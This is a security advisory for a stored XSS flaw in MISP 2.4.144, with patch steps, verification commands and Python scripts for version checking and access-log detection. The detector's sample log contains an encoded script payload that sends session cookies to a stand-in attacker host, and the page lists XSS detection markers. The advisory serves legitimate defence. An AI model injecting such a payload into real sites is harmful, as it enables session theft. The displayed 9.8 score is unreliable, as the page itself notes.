CVE-2021-35502

9.8 CRITICAL (score as displayed on this page; the rest of this page describes a stored XSS that needs an authenticated account and user interaction, which CVSS v3.x normally rates in the MEDIUM range, so check the NVD record for the authoritative score)

📋 TL;DR

CVE-2021-35502 is a stored cross-site scripting (XSS) vulnerability in MISP (Malware Information Sharing Platform) 2.4.144. The view element app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp writes a field value into the page without HTML-escaping it, so attacker-controlled data shown in the affected index view (generic-template:index) is rendered as markup. Any user who opens that page in a browser runs the injected script in the context of their own MISP session.

💻 Affected Systems

Products:
  • MISP (Malware Information Sharing Platform)
Versions: 2.4.144 (fixed in 2.4.145)
Operating Systems: All platforms running MISP
Default Config Vulnerable: ⚠️ Yes
Notes: Affects only the web interface (the API is not involved in rendering the view). Exploitation requires a victim to view the page containing the injected content.

📦 What is this software?

MISP is an open-source threat intelligence platform used to collect, store and share indicators of compromise and related threat data between organizations. It is a PHP web application built on CakePHP, normally deployed behind Apache or nginx, and its views render data that was entered by other users or synchronized from other MISP instances.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Takeover of an administrator's session: a script executing in an admin's browser can perform any action the admin can through the UI, such as creating privileged users, changing server settings or exporting sensitive events. Remote code execution on the server is not a direct consequence of this XSS and would need a separate, unrelated weakness.

🟠

Likely Case

Session hijacking, exfiltration of threat data the victim can see, and unauthorized actions performed in the name of authenticated users who view the injected content.

🟢

If Mitigated

With the patched view in place the injected markup is HTML-escaped and displayed as plain text. A Content Security Policy that forbids inline script further limits the damage if another escaping gap is found, but CSP alone is not a fix.

🌐 Internet-Facing: HIGH - On an internet-reachable instance the attacker only needs an account that can create the affected data and then has to wait for a privileged user to view it.
🏢 Internal Only: MEDIUM - Any internal user (or a compromised internal account) who can enter data shown in the affected view can target other users of the same instance, including administrators.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No (the attacker needs to get content into data rendered by the affected view, which normally means an authenticated MISP account)
Complexity: LOW

Exploitation consists of storing a value containing HTML or JavaScript in a field rendered by generic_field.ctp and waiting for a victim to open the index page. The defect is a single missing output-encoding call in that view element, not a flaw in the CakePHP templating engine itself.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.4.145 and later

Vendor Advisory: https://github.com/MISP/MISP/commit/2fde6476dc3173affc61874ba2adb35400a8fda5

Restart Required: Yes

Instructions:

1. Back up your MISP instance and database.
2. Update MISP to version 2.4.145 or later using git: 'cd /var/www/MISP && git pull origin 2.4'.
3. Run the update script as the web server user: 'sudo -u www-data bash /var/www/MISP/app/Console/cake Admin updateMISP'.
4. Restart the web server so PHP's opcode cache drops the old compiled view: 'sudo systemctl restart apache2' (or nginx and php-fpm if that is your setup).

🔧 Temporary Workarounds

Input Validation Filter

all

Filtering input is only a stopgap: the defect is missing output encoding in the view, and the vendor fix wraps the value in CakePHP's h() helper in generic_field.ctp. If you cannot move to 2.4.145 immediately, applying the single vendor commit to your checkout ('cd /var/www/MISP && git cherry-pick 2fde6476dc3173affc61874ba2adb35400a8fda5') is smaller and more reliable than adding request-level filtering in app/Controller/AppController.php, which cannot catch content that arrives through synchronization or encoded forms a blocklist does not anticipate.

Content Security Policy

linux

A CSP that forbids inline script stops the injected payload from executing even when escaping is missing. Note that the MISP interface relies on inline JavaScript, so a policy this strict will break pages; test it on a staging instance first and expect to need adjustments before deploying it.

# Add to web server config: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
# For Apache: in .htaccess or virtual host config (requires mod_headers)

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block XSS payloads in requests; make sure the rules inspect URL-decoded parameters and POST bodies, since payloads are rarely sent as literal '<script' in the request line
  • Disable or restrict access to generic field functionality if not required, and restrict who may create the data shown in the affected view

🔍 How to Verify

Check if Vulnerable:

Check the installed release: 'cat /var/www/MISP/VERSION.json' (MISP records major, minor and hotfix there). A hotfix value of 144 means you are vulnerable. In a git checkout you can also test whether the fix commit is already in your history: 'cd /var/www/MISP && git merge-base --is-ancestor 2fde6476dc3173affc61874ba2adb35400a8fda5 HEAD && echo patched || echo vulnerable'. Note that seeing this hash in your history means the fix is present, not that you are vulnerable.

Check Version:

cd /var/www/MISP && (git describe --tags || cat VERSION.json || echo 'Not a git repo, check version manually')

Verify Fix Applied:

Verify the version is 2.4.145 or later: 'cd /var/www/MISP && git describe --tags' (or read VERSION.json). Then confirm the view escapes the value, using a fixed-string grep and escaping the dollar sign so the shell does not expand it: 'grep -nF "h(\$field['value'])" app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp'. An empty result on a checkout that claims to be 2.4.145 or later means the file was locally modified or the update did not complete.
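The script below automates both checks from this section. It is an added example, not part of this page or of MISP's own tooling. It assumes that MISP keeps a VERSION.json file in the repository root with major, minor and hotfix fields, that the patched view wraps the value in CakePHP's h() helper, and that the checkout lives under /var/www/MISP; the template snippets and version strings embedded below are constructed approximations of the real files, not copies of them.

```python
import json
import os
import re

# Constructed sample inputs (approximations, not copied from a MISP checkout).
VERSION_JSON_VULNERABLE = '{"major":2, "minor":4, "hotfix":144}'
VERSION_JSON_FIXED = '{"major":2, "minor":4, "hotfix":145}'
# Hypothetical before/after shape of the affected line in generic_field.ctp.
TEMPLATE_VULNERABLE = "<?php\n    echo $field['value'];\n"
TEMPLATE_FIXED = "<?php\n    echo h($field['value']);\n"

FIXED_VERSION = (2, 4, 145)  # first release containing commit 2fde6476
TEMPLATE_PATH = "app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp"

# Matches the field value being echoed inside CakePHP's h() escaping helper.
ESCAPED_RE = re.compile(r"\bh\(\s*\$field\['value'\]")


def parse_version(version_json_text):
    """Return (major, minor, hotfix) from the contents of VERSION.json."""
    data = json.loads(version_json_text)
    return (int(data["major"]), int(data["minor"]), int(data["hotfix"]))


def version_is_vulnerable(version_json_text):
    """True when the installed release predates the fix."""
    return parse_version(version_json_text) < FIXED_VERSION


def unescaped_echoes(template_source):
    """Return (line number, line) for echoes of $field['value'] not wrapped in h().

    Heuristic: it flags the pattern the vendor commit changed, not every
    conceivable way of emitting the value (e.g. short echo tags).
    """
    findings = []
    for lineno, line in enumerate(template_source.splitlines(), 1):
        if "echo" in line and "$field['value']" in line and not ESCAPED_RE.search(line):
            findings.append((lineno, line.strip()))
    return findings


def check_instance(misp_root="/var/www/MISP"):
    """Run both checks against an on-disk checkout (the path is an assumption)."""
    with open(os.path.join(misp_root, "VERSION.json"), encoding="utf-8") as fh:
        version_text = fh.read()
    with open(os.path.join(misp_root, TEMPLATE_PATH), encoding="utf-8") as fh:
        template_text = fh.read()
    return {
        "version": parse_version(version_text),
        "version_vulnerable": version_is_vulnerable(version_text),
        "unescaped_echoes": unescaped_echoes(template_text),
    }


if __name__ == "__main__":
    import sys

    result = check_instance(sys.argv[1] if len(sys.argv) > 1 else "/var/www/MISP")
    status = "VULNERABLE" if result["version_vulnerable"] or result["unescaped_echoes"] else "patched"
    print("MISP %d.%d.%d: %s" % (result["version"] + (status,)))
    for lineno, line in result["unescaped_echoes"]:
        print("  unescaped echo at line %d: %s" % (lineno, line))
```

Run it as 'python3 check_misp_35502.py /var/www/MISP'. The two checks are deliberately independent: the version test catches an instance that was never updated, while the template scan catches a checkout whose version bumped but whose view file was overwritten by a local modification.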

📡 Detection & Monitoring

Log Indicators:

  • Requests whose URL-decoded query parameters contain script tags, event handlers or javascript: URLs. Web server access logs record only the request line, so a payload submitted in a POST body never appears there; MISP's own audit log (Administration > Audit Logs, /admin/logs/index) records the resulting create and edit actions and is the better place to look for the stored content
  • Administrative actions in the MISP audit log (new users, role or setting changes, new API keys) that the owning user does not recognize, which is what a hijacked admin session looks like from the server side

Network Indicators:

  • HTTP requests containing <script> tags or JavaScript in URL parameters, usually URL-encoded (%3Cscript%3E) and sometimes double-encoded, so decode before matching
  • Outbound connections from analysts' browsers to unknown hosts while they are using MISP; the script runs in the victim's browser, not on the MISP server, so the exfiltration traffic originates from the user's workstation

SIEM Query:

source="misp_access.log" AND ("<script" OR "javascript:" OR "onerror=" OR "onload=")

This query matches only literal, unencoded payloads; if your platform cannot decode the URL before matching, add the encoded forms ("%3Cscript", "javascript%3A", "onerror%3D", "onload%3D") as extra terms.
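The detection logic from the SIEM query, as an added example that is not part of this page or of MISP: it parses Apache combined-format access log lines, URL-decodes the request (repeatedly, to expose double encoding), and matches the markers case-insensitively. The log lines are constructed for the example and the request paths and attacker host in them are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not from a real instance).
# The second line carries a URL-encoded payload, the third a double-encoded one,
# and the fourth is a POST whose body (where a payload would be) is not logged.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2021:10:01:02 +0000] "GET /generic_templates/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jul/2021:10:01:09 +0000] "GET /generic_templates/index?name=%3Cscript%3Efetch(%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5331 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jul/2021:10:02:30 +0000] "GET /events/index?searchall=%2522%2520onerror%253Dalert(1)%2520x%253D%2522 HTTP/1.1" 200 8802 "-" "curl/7.68.0"
10.0.0.5 - - [12/Jul/2021:10:03:00 +0000] "POST /generic_templates/add HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The markers from the SIEM query plus common tag-based vectors, matched
# case-insensitively against the decoded request.
XSS_MARKERS = re.compile(
    r"<script|javascript:|\bon(?:error|load|mouseover|focus)\s*=|<img\b|<svg\b|<iframe\b",
    re.IGNORECASE,
)


def decode_request(path, max_rounds=3):
    """URL-decode until the string stops changing (bounded) so that
    double-encoded payloads such as %253C become visible. '+' is left
    as-is so a decoded 'a+b' is not turned into a space on a later pass."""
    current = path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_xss_requests(log_text):
    """Return one dict per request whose decoded path contains an XSS marker."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        decoded = decode_request(m["path"])
        marker = XSS_MARKERS.search(decoded)
        if marker:
            hits.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "method": m["method"],
                "status": m["status"],
                "decoded_path": decoded,
                "marker": marker.group(0).lower(),
            })
    return hits


if __name__ == "__main__":
    for hit in find_xss_requests(SAMPLE_LOG):
        print("%(timestamp)s %(ip)s %(method)s [%(marker)s] %(decoded_path)s" % hit)
```

Against the sample both GET requests are flagged while the POST is not, which is the limitation to remember: access logs never show a payload submitted in a form body, so this detection complements, rather than replaces, review of MISP's audit log.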

🔗 References

  • Fix commit: https://github.com/MISP/MISP/commit/2fde6476dc3173affc61874ba2adb35400a8fda5
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-35502